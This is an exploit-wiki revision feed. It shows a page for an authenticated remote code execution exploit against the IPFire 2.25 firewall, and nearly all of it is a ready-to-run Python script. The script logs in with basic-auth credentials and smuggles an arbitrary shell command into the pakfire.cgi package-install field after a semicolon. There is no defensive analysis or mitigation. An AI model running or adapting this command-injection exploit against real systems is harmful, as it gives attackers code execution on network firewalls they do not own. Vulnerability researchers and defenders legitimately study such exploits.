https://pwnwiki.com/index.php?action=history&feed=atom&title=IPFire_2.25_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E IPFire 2.25 遠程代碼執行漏洞 - Revision history 2026-04-10T14:31:15Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=IPFire_2.25_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=2884&oldid=prev Pwnwiki: Created page with "==EXP== <pre> # Exploit Title: IPFire 2.25 - Remote Code Execution (Authenticated) # Date: 15/05/2021 # Exploit Author: Mücahit Saratar # Vendor Homepage: https://www.ipfire...." 2021-05-17T10:18:52Z <p>Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: IPFire 2.25 - Remote Code Execution (Authenticated) # Date: 15/05/2021 # Exploit Author: Mücahit Saratar # Vendor Homepage: https://www.ipfire....&quot;</p> <p><b>New page</b></p><div>==EXP==<br /> &lt;pre&gt;<br /> # Exploit Title: IPFire 2.25 - Remote Code Execution (Authenticated)<br /> # Date: 15/05/2021<br /> # Exploit Author: Mücahit Saratar<br /> # Vendor Homepage: https://www.ipfire.org/<br /> # Software Link: https://downloads.ipfire.org/releases/ipfire-2.x/2.25-core156/ipfire-2.25.x86_64-full-core156.iso<br /> # Version: 2.25 - core update 156<br /> # Tested on: parrot os 5.7.0-2parrot2-amd64<br /> <br /> #!/usr/bin/python3<br /> <br /> import requests as R<br /> import sys<br /> import base64<br /> <br /> try:<br /> host = sys.argv[1]<br /> assert host[:4] == &quot;http&quot; and host[-1] != &quot;/&quot;<br /> url = host + &quot;/cgi-bin/pakfire.cgi&quot;<br /> username = sys.argv[2]<br /> password = sys.argv[3]<br /> komut = sys.argv[4]<br /> except:<br /> print(f&quot;{sys.argv[0]} http://target.com:444 username password command&quot;)<br /> exit(1)<br /> <br /> veri = { <br /> &quot;INSPAKS&quot;: f&quot;7zip;{komut}&quot;,<br /> &quot;ACTION&quot;:&quot;install&quot;,<br /> &quot;x&quot;: &quot;10&quot;,<br /> &quot;y&quot;: &quot;6&quot; }<br /> token = b&quot;Basic &quot; + base64.b64encode(f&quot;{username}:{password}&quot;.encode())<br /> header = {&quot;Authorization&quot;: token,<br /> &quot;Connection&quot;: &quot;close&quot;,<br /> &quot;Cache-Control&quot;: &quot;max-age=0&quot;,<br /> &quot;User-Agent&quot;: &quot;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36&quot;,<br /> &quot;Origin&quot;: host,<br /> &quot;Sec-GPC&quot;: &quot;1&quot;,<br /> &quot;Sec-Fetch-Site&quot;: &quot;same-origin&quot;,<br /> &quot;Sec-Fetch-Mode&quot;: &quot;navigate&quot;,<br /> &quot;Sec-Fetch-User&quot;: &quot;?1&quot;,<br /> &quot;Sec-Fetch-Dest&quot;: &quot;document&quot;,<br /> &quot;Referer&quot;: host}<br /> <br /> <br /> R.post(url, data=veri, headers=header, verify=False)<br /> print(&quot;Done.&quot;)<br /> &lt;/pre&gt;</div> Pwnwiki